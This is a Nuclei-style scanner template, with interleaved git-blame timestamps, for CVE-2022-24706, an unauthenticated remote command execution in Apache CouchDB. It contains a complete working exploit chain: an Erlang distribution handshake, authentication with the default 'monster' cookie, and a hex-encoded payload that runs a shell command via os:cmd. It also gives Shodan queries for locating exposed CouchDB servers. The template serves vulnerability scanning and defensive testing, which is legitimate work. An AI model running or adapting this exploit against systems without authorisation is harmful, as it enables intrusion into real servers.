2023-04-24 20:49:06 +00:00
id : CVE-2022-24706
2023-04-16 16:32:56 +00:00
info :
2023-04-24 20:49:06 +00:00
name : CouchDB Erlang Distribution - Remote Command Execution
author : Mzack9999,pussycat0x
2023-04-16 16:32:56 +00:00
severity : critical
2023-04-24 20:49:06 +00:00
description : |
In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected system.
2023-09-06 13:28:19 +00:00
remediation : |
Upgrade to versions 3.2.2 or newer. Starting from CouchDB 3.2.2, the previous default Erlang cookie value "monster" will be rejected upon startup. Upgraded installations will be required to select an alternative value.
2023-04-24 20:49:06 +00:00
reference :
- https://www.exploit-db.com/exploits/50914
2023-06-06 06:42:39 +00:00
- https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit/blob/main/CVE-2022-24706-Exploit.py
- https://nvd.nist.gov/vuln/detail/CVE-2022-24706
2023-07-16 13:29:08 +00:00
- http://www.openwall.com/lists/oss-security/2022/04/26/1
- http://www.openwall.com/lists/oss-security/2022/05/09/1
2023-07-10 00:25:11 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2022-24706
cwe-id : CWE-1188
2024-04-08 11:34:33 +00:00
epss-score : 0.9748
epss-percentile : 0.99964
2023-07-16 13:29:08 +00:00
cpe : cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:*
2023-04-24 20:49:06 +00:00
metadata :
2023-06-21 21:03:53 +00:00
verified : "true"
2023-09-06 13:28:19 +00:00
max-request : 2
2023-07-16 13:29:08 +00:00
vendor : apache
product : couchdb
2024-06-07 10:04:29 +00:00
shodan-query :
- product:"CouchDB"
- product:"couchdb"
- cpe:"cpe:2.3:a:apache:couchdb"
tags : cve2022,network,cve,couch,rce,kev,couchdb,apache,tcp
2023-04-16 16:32:56 +00:00
variables :
2023-06-06 07:07:03 +00:00
name_msg : "00156e00050007499c4141414141414041414141414141"
2023-04-16 16:32:56 +00:00
challenge_reply : "00157201020304"
cookie : "monster"
cmd : "0000006670836804610667770e41414141414140414141414141410000000300000000007700770372657883680267770e41414141414140414141414141410000000300000000006805770463616c6c77026f737703636d646c000000016b000269646a770475736572"
2023-06-06 07:17:45 +00:00
tcp :
2023-07-16 13:29:08 +00:00
- host :
- "{{Hostname}}"
- "{{Host}}:9100"
inputs :
2023-04-16 16:32:56 +00:00
# auth
- data : "{{name_msg}}"
type : hex
read : 1024
- read : 1024
name : challenge
- data : "{{challenge_reply+md5(cookie + to_string(unpack('>I',substr(challenge, 9, 13))))}}"
type : hex
# rce
- data : "{{cmd}}"
type : hex
read : 1024
matchers :
- type : word
part : raw
words :
- "uid"
- "gid"
- "groups"
2023-04-24 20:49:06 +00:00
condition : and
2024-06-08 16:02:17 +00:00
# digest: 4b0a00483046022100eec69534c4bc24d089831c7ca76f8b9e29a13f00790f0b52710b3567dcf0ce23022100a94fe33991523dfeb84133320010e444faf7492033a362a6b17562362a0cceb9:922c64590222798bb761d5b6d8e72950